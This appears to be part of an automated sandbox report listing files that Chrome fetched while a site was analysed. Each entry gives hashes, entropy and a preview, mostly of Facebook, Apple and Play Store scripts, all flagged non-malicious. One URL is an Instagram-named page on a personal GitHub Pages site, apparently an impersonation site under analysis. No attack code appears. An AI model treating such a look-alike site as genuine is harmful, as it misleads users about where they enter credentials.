                                                                                                                                                                                                                                SSDEEP:12:glPvZ8rMPc9PI50zUF799AGR/DinkhVj62pqJCI9tv2wsgDMnpR:ACrMQUF799/hDinknj6yI9tuwfQnv
                                                                                                                                                                                                                                MD5:42FA2E158D0BDDE364A460615B6882B2
                                                                                                                                                                                                                                SHA1:AAA3FF44AFCBE137C7260BD325B8A9AE82EF1709
                                                                                                                                                                                                                                SHA-256:F5C01B13D872E242577860F4BDF541651594BB4FF7B7F4863DD149E78F33D52D
                                                                                                                                                                                                                                SHA-512:0F286EC7F0FBD715585F6A643C3D9E2842FFF33931C5DE54B6D4CD3FC84A65A4C1429725D79C5230B38B11DEEE265B5F4A9355DEB68BA41E86246122111572A1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8L..../?.....6.mU.....S.eX.......{.p.....kF.1....t.z...*...:$....B.:.:.......?....V..C.5.....S.....2./...]...L.fl..9#./.\.'...A..X0..-.P.'.<.i...(.|.G...H.....>I2.(d.K...B.I..D..*..g-...n.9(. .....sJ>........T.!"r.^.A..'#.4..+.I..l.^.....X....../.S.`..<..~.w=.....m.6.bl.N...bl.6?_.E..D._@P..N.....Y.Rf.T..h.v.....2..T.((...5.k.o...#.fCY~../...3T.TK5.P[Zn....s..G#R4.M...,.j.^.NMJS..::..-,jk..LNH.1h......-.h.F..7....Ym...............:..vH.Nh..4....t..G&.d...&.m.g......H...mi....F:..n.;....o..6..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):733
                                                                                                                                                                                                                                Entropy (8bit):4.7574006224426535
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:YGKzFDsip968DDp8MIfE1lI11I1581f58zrF8qWKxk8IV5wDKOBuGpQJNGzF/BQU:YdxDsinqMIqlI3I1y1fyzr+jcdD9J+Sn
                                                                                                                                                                                                                                MD5:CC64BFA00B4B3FF916A983A0C27DEA58
                                                                                                                                                                                                                                SHA1:62452E81D49DF7E3EDAE74AE32A3E9A613DCFE86
                                                                                                                                                                                                                                SHA-256:67CB92C8D3E193BCAC15DEBC8CC34C5D2CE531C9A13D037EBFECDC662679215A
                                                                                                                                                                                                                                SHA-512:C6D1D59F4D354EF39AA6D59002D23AB6AEA977CC3B68FE9A6D0821FC0C6EE279390A35B8DB2E7E8D39C913694811CEF04763452D8075C63722700E2B5120F3EC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:{"compoundSeparator":"_","fieldsMap":{"loadUrl":{"timestampFields":{"fetchStartTime":["fetchStart"],"domainLookupStartTime":["domainLookupStart"],"domainLookupEndTime":["domainLookupEnd"],"connectionStartTime":["connectStart"],"connectionEndTime":["connectEnd"],"secureConnectionStartTime":["secureConnectionStart"],"requestStartTime":["requestStart"],"responseStartTime":["responseStart"],"responseEndTime":["responseEnd"]},"otherFields":{"requestUrl":["name"],"transferSize":["transferSize"]}}},"metricsUrl":"https://xp.apple.com/report","performance":{"samplingPercentage":0.25,"samplingPercentageUsers":0.25,"sessionDuration":60000,"samplingPercentageUsersPageRender":0.25,"sessionDurationPageRender":60000},"postFrequency":5000}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6074)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):42228
                                                                                                                                                                                                                                Entropy (8bit):5.4392336436603115
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:xS0vaKKc046ua0iuyZC7sy2fOq8sMwjwr0ifGTpWeQs1bA6Mw5Z49xr+3hYmJ:o0vaKKJ2yZC7sy2fOqOwjwr0ifGTpWeP
                                                                                                                                                                                                                                MD5:7474DE3D2949B8F685DF177F250F6A9D
                                                                                                                                                                                                                                SHA1:DA6E1C04754418FC9726F4B937789887F3AA63E7
                                                                                                                                                                                                                                SHA-256:A1869D4A2B4EA39126F3C40B4830EBBD0C04B0C9F8E55B0FD206EB996EEB6903
                                                                                                                                                                                                                                SHA-512:BFB102814A697AF07B0CE2B8D11C7519F1CFDBE16296E73BACAC2E98F04518373531AF45996153EB1980ED40F866068D91234C761D7CF8E08860C41846F9CA4B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3i5IJ4/yI/l/en_GB/erWoO4SeR1N.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdsAdoptionCloseButton.react",["BUICloseButton.react","react"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||d("react");function a(a){a.size;a=babelHelpers.objectWithoutPropertiesLoose(a,["size"]);return i.jsx(c("BUICloseButton.react"),babelHelpers["extends"]({size:"large"},a))}a.displayName=a.name+" [from "+f.id+"]";g["default"]=a}),98);.__d("ContextualDialog.react",["ReactAbstractContextualDialog","ReactLayer"],(function(a,b,c,d,e,f,g){a=d("ReactLayer").createClass(d("ReactAbstractContextualDialog").createSpec({displayName:"ReactContextualDialog"}));b=a;g["default"]=b}),98);.__d("AdsPopoverLink_DEPRECATED.react",["cx","ix","AdsFBIconDownsized.react","BUICloseButton.react","ContextualDialog.react","Image.react","LayerFadeOnHide","UserAgent_DEPRECATED","clearTimeout","joinClasses","react","setTimeout"],(function(a,b,c,d,e,f,g,h,i){"use strict";var j,k=j||(j=d("react"));a=j.Component;var l={imgNormal:i("403740"),imgHover:i("403741")};b=function(a){babelHelpers
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (14008)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):80554
                                                                                                                                                                                                                                Entropy (8bit):5.472094188360212
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:WgOvE4SMUyM00qiV+1qW7GNNXHMJhFOuUATsUDuRZskq6vSIghFQe:2OKMV5/qe6CRs
                                                                                                                                                                                                                                MD5:FDB9C1F20F28A8D325381794CAC0DB44
                                                                                                                                                                                                                                SHA1:B15729F3CBE270C665E35C7A7B53552592F393F6
                                                                                                                                                                                                                                SHA-256:5EBBB25432E3F899E1A55AAC5E35F7DD1EB35F83068311CB521035F09AC6366D
                                                                                                                                                                                                                                SHA-512:DE872F58E30CE70DD92AC91741644E7D077A83252CE4328DF825AC48F97D0B9E673E6D5C55E11DE8952545D4577AAB20988887299B9315649D0E1646BAB0904D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3iwp84/yz/l/en_GB/yH3NmCM2cz1.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ARIAComboboxNotify",["fbt","ARIA","UserAgent"],(function(a,b,c,d,e,f,g,h){"use strict";var i=!c("UserAgent").isPlatform("Mac OS X");function a(a){if(a&&!i){var b=a.getTitle();a=a.getSubtitle();d("ARIA").notify(a?b+", "+a:b);return!0}return!1}function b(a){a=h._({"*":"Found {number} results","_1":"Found 1 result"},[h._plural(a?a.length:0,"number")]);d("ARIA").notify(a)}g.maybeNotifyHighlightedEntry=a;g.notifyFoundEntries=b}),226);.__d("AbstractTokenizer.react",["cx","cr:4057","cr:6052","cr:7934","emptyFunction","getActiveElement","joinClasses","react"],(function(a,b,c,d,e,f,g){var h,i=h||b("react");a=function(a){"use strict";babelHelpers.inheritsLoose(c,a);function c(){var c,d;for(var e=arguments.length,f=new Array(e),g=0;g<e;g++)f[g]=arguments[g];return(c=d=a.call.apply(a,[this].concat(f))||this,d.$1=i.createRef(),d.$2=i.createRef(),d.state={queryString:"",lastQueryString:d.props.queryString},d.focusInput=function(){d.$1.current!=null&&d.$1.current.focusInput()}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (10467)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):175637
                                                                                                                                                                                                                                Entropy (8bit):5.543169719587562
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:4ghUaItJU64CI4gCEMcqdEc9QkLv1vQcqdI08QBVMJ6FIOKaKtYBZ:4ghUaItJU64T4gCEMcexQkLv1vQceI0h
                                                                                                                                                                                                                                MD5:F9A32D9AA0001580F8F84862DCEB9ED2
                                                                                                                                                                                                                                SHA1:027A1D65EA4500404BF33F155C52E592BE9267B1
                                                                                                                                                                                                                                SHA-256:D4C628FF740F0C7D7637EDC1FE6DC8A90EC8A24A406D3C83F2E99128D624E398
                                                                                                                                                                                                                                SHA-512:BF5312CCFE75EA7BECD7A007C0BFD06F4285D9ED29BB848DDE8C41961F24CC7E3343D5332E6AA7F2B717A58AD8F2258DBC32BE84794FB2FBBCF7882DF5F4CC27
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3ijJ_4/yf/l/en_GB/BBd2uei_xHo.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("APIConstants.brands",[],(function(a,b,c,d,e,f){"use strict";a="3.0";b="v"+a;c=3e3;d=750;f.GRAPH_API_VERSION=a;f.API_VERSION=b;f.DEFAULT_API_LIMIT=c;f.DEFAULT_API_ACCUMULATE_LIMIT=d}),66);.__d("SearchSourceQueryStatus",[],(function(a,b,c,d,e,f){a="ACTIVE";b="COMPLETE";f.ACTIVE=a;f.COMPLETE=b}),66);.__d("SearchSourceCallbackManager",["invariant","SearchSourceQueryStatus","createObjectFrom","nullthrows"],(function(a,b,c,d,e,f,g,h){a=function(){function a(a){this.$9=a.parseFn,typeof this.$9==="function"||h(0,4065),this.$8=a.matchFn,typeof this.$8==="function"||h(0,4066),this.$2=a.alwaysPrefixMatch||!1,this.$6=a.indexFn||i,this.$4=a.exclusions||{},this.reset()}var b=a.prototype;b.search=function(a,b){var c=this.$13(a,b);if(c)return 0;this.$1.push({queryString:a,callback:b});c=this.$1.length-1;this.$10.push(c);return c};b.$13=function(a,b){var c=this,e=this.$14(a),f=!!this.$5[a];if(!e.length){b([],a,f?d("SearchSourceQueryStatus").COMPLETE:d("SearchSourceQueryStatus").
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):81561
                                                                                                                                                                                                                                Entropy (8bit):5.343746592742468
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:RJeUwT76HXhpwNCHM9ZK0BK01QJnYTZ02LKVsdmpyKcicMky:RIT7OXDs9ZKAKBtYj8wKcHM3
                                                                                                                                                                                                                                MD5:93BBEFE809CA6D13CE9D268992A2CCB9
                                                                                                                                                                                                                                SHA1:A48527C92D40BA399BA05F884B74750AF08F4524
                                                                                                                                                                                                                                SHA-256:E478089461CCB3C99FFFA89D04E02A48A7DB163A211C42CF36C4CEFBD6511F22
                                                                                                                                                                                                                                SHA-512:5B4C85F285D834FDB889B0171FB00C54C0B28C6E53C1B41045747CBD9E05A0F8C9858406C8394F6F532F129FF6652A360AF945951EEB2E12503F18B585792FE4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 206 x 58, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):3841
                                                                                                                                                                                                                                Entropy (8bit):7.55092275485853
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:4G+kH1Z9kSc0gh02rcTjdVX90SqLrUGc5xelk4Go5o:L+kVTkSbzM4l1Bo5o
                                                                                                                                                                                                                                MD5:C46F54E523F2656D2F518D51623448A0
                                                                                                                                                                                                                                SHA1:D8F8311AE18FCD2B0D9BEA85EB29A20E209518F8
                                                                                                                                                                                                                                SHA-256:B9C604018A550B63D359608469904DE09B8EFC5F38395CCA106FAA49262DFDE0
                                                                                                                                                                                                                                SHA-512:9EB3830D8647D31CFBB5587C5FE0C06066E95BBEB23C3C65076EEB6448EC6D42C615FC42EBA446AF054866E15FEFC7C9D205DF4846D886B0242B76FBA7E5602A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://sayidanur.github.io/instagram.com/img//instagram-logo.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......:............PLTE...#. #. ...# $.$#. '!!@ @# $$$$ !#. (""#. +++$$$%!!UUU# !...'!!$.!$ !%.%$. ...# ## !.### !)##@@@(""# "% %&!!$ !# #$!!)))$ # !%.!333%""$ $# !$.!$ !$ !$ &""999&&&% "#. '''&!!(((#.!$ !$$$%."# "$ $.!#### !$ $.!% $ $.!$.!$!!$.!$$$# !$. %."$ !$. '''$ !#.!,!!)""$ !# $!!$ #.#+ +$ $!!$. ######+++$. $ !$!!# !&""$ $&&&+++$.!####.!$ !333$. ( (3""---# $!!'##$.!)!!$ &""# $."$""$ "'##$ $ # !$. &&&& &$ !$ $. $ "% $ $."#.!#. $. %!!$ "# !$ &""$.!$ $ %""# $ !#.!%""$ $. $!!#.!$!!$ !$$$$$$$!!$!!'''# "% "$. #!!$ !$ $ "$ !# $.!$$$# !$."$.!%!!# # #. % $. %!!+""$ $.!% "# !# %.!$.!%!!#.!$ !% #%!!&.##!!$.!$ !$ '""#.!# !&!!#.!#!!% # !$ # # !$!!#.!& ##!!% &."$$$& $ $.!$ "$ !$.$#!!$ "#!!#.!&.#$ $ "# # $ 0 0$ !$ !#.!$!!$!!#.!$ !$ "$ $.!$!!#. R.......tRNS.....1....2..&...>...'..)..P...,.-.0=.Hk....K@...C..a.!/...*R..z$.oO..d.#..Z.....%.WN.A..\.3......58...:... ...VB..~D.j[.;...."(...in.b...Eq.G<..L..S..F.U.......h.m.?......r
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1881)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):42032
                                                                                                                                                                                                                                Entropy (8bit):5.436259422203893
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:TBKiTA/pZGZJmpQbAFSSCN5VoEmp8oQDt+U9JU7vvc/sl0ov09MCDTVMrhvUVsbN:aTGZgCNDv+eUlsDTYhvYQ/gCqehTPUgV
                                                                                                                                                                                                                                MD5:6A62C13FDFCB467B2953F9CCEDCCF523
                                                                                                                                                                                                                                SHA1:D5CCD0646CEB76A56954BE1016FD1EB65E17D10F
                                                                                                                                                                                                                                SHA-256:6AF490BACF55B2D6858CA35B3F40E659E49E320D715BE00E669ED6371F6FC00A
                                                                                                                                                                                                                                SHA-512:610FB3519E13CDC8DE5EDEA21604BD112CE6E962566514174DA046D6FA12705292D1F2C91539EF177F66FC1CE9C9FCAB1AE0989852775994C037CBA27BB24628
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.Hqa=function(a){let b=0;for(const c in a)b++;return b};_.Iqa=function(a,b){for(const c in a)if(a[c]==b)return!0;return!1};_.Jqa=function(a){return a.Kh&&typeof a.Kh=="function"?a.Kh():_.da(a)||typeof a==="string"?a.length:_.Hqa(a)};._.Sn=function(a){if(a.Ci&&typeof a.Ci=="function")return a.Ci();if(typeof Map!=="undefined"&&a instanceof Map||typeof Set!=="undefined"&&a instanceof Set)return Array.from(a.values());if(typeof a==="string")return a.split("");if(_.da(a)){for(var b=[],c=a.length,d=0;d<c;d++)b.push(a[d]);return b}return _.Va(a)};._.Kqa=function(a){if(a.tn&&typeof a.tn=="function")return a.tn();if(!a.Ci||typeof a.Ci!="function"){if(typeof Map!=="undefined"&&a instanceof Map)return Array.from(a.keys());if(!(typeof Set!=="undefined"&&a instanceof Set)){if(_.da(a)||typeof a==="string"){var b=[];a=a.length;for(var c=0;c<a;c++)b.push(c);return b}return _.Wa(a)}}};.var Lqa,Mqa,Nqa
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (10672)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):25512
                                                                                                                                                                                                                                Entropy (8bit):5.5380769875937625
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:E6W9FDn62dhKmyqkXZ0XhnDGZjTVr1nDdU6DQGMq9wHAY:6FDn6HPZSahBvDQGMq8f
                                                                                                                                                                                                                                MD5:2F4D956ECEAB1D26E4CA599AFA43C5AB
                                                                                                                                                                                                                                SHA1:162DA72F1DAA41895100BC9D27690211C1B10637
                                                                                                                                                                                                                                SHA-256:2B4E3CBEB334AC5E6ED008EAE87AD245E74C4F4DB1C3BCC0BE192D421E228B03
                                                                                                                                                                                                                                SHA-512:DFE0E85011451E31217F5C5B0EB70C6F054398B90A4C1024364ABECDC60DE02BE7B2A4A98C7569B3E9C0D654D7DEC5E6E4741BBE99BE868005B21423B8E84246
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/. */.__d("color-name-1.1.3",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){g.exports={aliceblue:[240,248,255],antiquewhite:[250,235,215],aqua:[0,255,255],aquamarine:[127,255,212],azure:[240,255,255],beige:[245,245,220],bisque:[255,228,196],black:[0,0,0],blanchedalmond:[255,235,205],blue:[0,0,255],blueviolet:[138,43,226],brown:[165,42,42],burlywood:[222,184,135],cadetblue:[95,158,160],chartreuse:[127,255,0],chocolate:[210,105,30],coral:[255,127,80],cornflowerblue:[100,149,237],cornsilk:[255,248,220],crimson:[220,20,60],cyan:[0,255,255],darkblue:[0,0,139],darkcyan:[0,139,139],darkgoldenrod:[184,134,11],darkgray:[169,169,169],darkgreen:[0,100,0],darkgrey:[169,169,169],darkkhaki:[189,183,107],darkmagenta:[139,0,139],darkolivegreen:[85,107,47],darkorange:[255,140,0],darkorchid:[153,50,204],darkred:[139,0,0],darksalmon:[233,150,122],darkseagreen:[143,188,143],darkslateblue:[72,61
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (9961)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):49381
                                                                                                                                                                                                                                Entropy (8bit):5.4893612792245285
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:JCrcX8WlQPwSgYPxSORD9S28tltgpAS3mjyV+ElS:0rcCPwSgYPxSORD9SDipAS2zEs
                                                                                                                                                                                                                                MD5:B0CE4498F3924CD09A1BB1C7BE14E311
                                                                                                                                                                                                                                SHA1:D6C702D3832D75D2FA6ED0FE02AE867A15D05134
                                                                                                                                                                                                                                SHA-256:662991BD2C2DEFEE27D0F01C27295BF675C3080E43D94AE35A5E6E50C6A48324
                                                                                                                                                                                                                                SHA-512:30DCB09798DF3EA2E4BE593C7F8DAABE614043FA8212EC0EEFF4820CD8A01F0BE6BDDE20536FBC6D6027B9EB80BA7998235D9E9D938DC8E744C7E5FE9080B26A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3ioXj4/y9/l/ru_RU/UlpshyJeqkw.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ArtillerySegment",["invariant","cr:9985"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"category"in a&&"description"in a||h(0,3138,JSON.stringify(a)),this.$1=!1,this.$2=babelHelpers["extends"]({},a,{id:(i++).toString(36)}),this.$3=[]}var c=a.prototype;c.getID=function(){return this.$2.id};c.begin=function(){this.$2.begin=b("cr:9985")();return this};c.end=function(){this.$2.end=b("cr:9985")();return this};c.appendChild=function(){var a=this;this.$1&&h(0,37302,this.$2.description);for(var b=arguments.length,c=new Array(b),d=0;d<b;d++)c[d]=arguments[d];c.forEach(function(b){a.$3.push(b.getID())});return this};c.setPosted=function(){this.$1=!0;return this};c.getPostData=function(){return babelHelpers["extends"]({},this.$2,{id:this.$2.id,children:this.$3.slice()})};return a}();g["default"]=a}),98);.__d("ArtillerySequence",["invariant"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"description"in a||h(0,1497,
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (8243)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):10408
                                                                                                                                                                                                                                Entropy (8bit):5.228704012543909
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:eZH7kUk70Eb1QAUf8HYTevU1gST4wLxr2:eRkR96ApHY2STr2
                                                                                                                                                                                                                                MD5:74F18E69FCEEB4513B9F24322BE7386E
                                                                                                                                                                                                                                SHA1:FE37CB92776F387DB632472296B0ADDEB815DD55
                                                                                                                                                                                                                                SHA-256:E3FDF2DDBE34D56ED6DB667544576B0821399F47124E09DC9671DD62CFD1DD28
                                                                                                                                                                                                                                SHA-512:7FAE4FBD35068C64252A7645D66FF19CFAF6FE02302A11070E503B315F58D12D48055A59DC72E7970E2FE0435D5095B6DE7FD61FA8C8DCCA07EC4DC376876B2D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yK/r/lNInKxOqejp.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/V9vdYColc4k/. */.__d("react-0.0.0",["React"],(function(a,b,c,d,e,f){"use strict";function a(a){return a&&typeof a==="object"&&"default"in a?a["default"]:a}var g=a(b("React"));d={};var h={exports:d};function i(){h.exports=g}var j=!1;function k(){j||(j=!0,i());return h.exports}function c(a){switch(a){case void 0:return k()}}e.exports=c}),null);.__d("react",["react-0.0.0"],(function(a,b,c,d,e,f){e.exports=b("react-0.0.0")()}),null);./**. * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/. */.__d("resize-observer-polyfill-1.5.1",[],(function(a,b,c,d,e,f){"use strict";var g={},h={exports:g};function i(){(function(b,c){typeof g==="object"&&typeof h!=="undefined"?h.exports=c():b.ResizeObserver=c()})(this,function(){var b=function(){if(typeof Map!=="undefined")return Map;function a(a,b){var c=-1;a.some(function(d,a){if(d[0]===b){c=a;return!0}return!1});return c}return function(){function b(){this.__entries__=
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (381)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):925
                                                                                                                                                                                                                                Entropy (8bit):5.223022542169909
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:u6oTTlrIYevhTuKtLG0MAWB6QeJRFrnDXvjV:upnlrpevhTuAG9AWWRFDDXvjV
                                                                                                                                                                                                                                MD5:E19C18502A12FDADA7F86888071328EA
                                                                                                                                                                                                                                SHA1:02203C7A7AA0B3FEFD4EC5179C5C1E6B6784B0C8
                                                                                                                                                                                                                                SHA-256:7AC6A1D9656FE05495E01D58E9C5823473A46347F9A7A23770915C1DD32E4CC1
                                                                                                                                                                                                                                SHA-512:4BEABBE238270C0ECB7C09310B143647D0B21D465059ED9FD63FFD27D5EEC80EEA23D4C1EC095E5665230C87479206D234817C83F44CBBB864B684E5043CB0CA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.const r=/([bptsq]){1}:(rgb\([\d,]+)\)/g,t={b:"backgroundColor",p:"primaryTextColor",s:"secondaryTextColor",t:"tertiaryTextColor",q:"quaternaryTextColor"};function o(o){if("string"!=typeof o)return{};const e=o.match(r);return e?e.map((r=>r.split(":"))).reduce(((r,o)=>{const[e,n]=o;r[t[e]]=n;const s=n.substring(4,n.length-1);return r[`${t[e]}RGBValues`]=s,r}),{}):{}}export{o as j}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3175)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):45694
                                                                                                                                                                                                                                Entropy (8bit):5.118242929635633
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:tpi7T07ytsSwuLFB3t8KbX3zrcW3HsBtuv3BtlK7vKH5v9u8kEFsW1:tpK1L5bTIByv9u1EFd
                                                                                                                                                                                                                                MD5:8B2EA74C2950F702116F9B02ABC52BCB
                                                                                                                                                                                                                                SHA1:AD7455A6E9F0D7E73BA4B80422EF805FC66F7879
                                                                                                                                                                                                                                SHA-256:FFEA291B7D7F014FDC619350CAC7B5CECF876DD20EFB498EF0D915FE3AC4BA17
                                                                                                                                                                                                                                SHA-512:942397EE9B53797364C02D073689CD3FC049E2EA7AF9D89F19608A61EBB76DA8A554D124F8BE99CECE74EB540806C9BBC383DAC238448D07A42DFC4D421B89A3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/chunk.990.023f8bfb4104e9778375.js
                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[990],{67990:function(e,t,n){n.r(t),n.d(t,{ClickstreamProcessor:function(){return we}}).var r=n(24178),i=n(32722),o=n(76588),s=function(){}.s.prototype.setDelegate=function(e){return r.SC.attachDelegate(this,e)},s.prototype.localStorageObject=r.tO.localStorageObject,s.prototype.sessionStorageObject=r.tO.sessionStorageObject.var a=function(){this.environment=new s,this.logger=(0,o.RG)("mt-client-constraints")},c={nonEmpty:function(e,t){return!!r.SC.isObject(t)&&t.hasOwnProperty(e)&&r.SC.isDefinedNonNullNonEmpty(t[e])},valueMatches:function(e,t,n){if(!r.SC.isObject(t))return!1.var i=t[e].return t.hasOwnProperty(e)&&n.indexOf(i)>-1}},p="overrideFieldValue",u=function(){}.u.prototype.constrainedValue=function(e,t,n){var r=e&&e.hasOwnProperty(n)?e[n]:null.return this.applyConstraintRules(r,t)},u.prototype.applyConstraintRules=function(e,t){var n=e.return t&&t.blacklisted?n=null:t&&t.hasOwnProp
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:C source, ASCII text, with very long lines (4181)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):24223
                                                                                                                                                                                                                                Entropy (8bit):5.429094862367194
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:wY4WrsTBXoWi8zyzso+nyQNZF13js4WHidus8XJqFWVzlP9wQ:f4WITB4WB4+/j1c7X4WVzlP99
                                                                                                                                                                                                                                MD5:4921AD7DB0310614641D131B883C33E5
                                                                                                                                                                                                                                SHA1:0126DE249CBA43DA8FA067523F4F21A71E5A3422
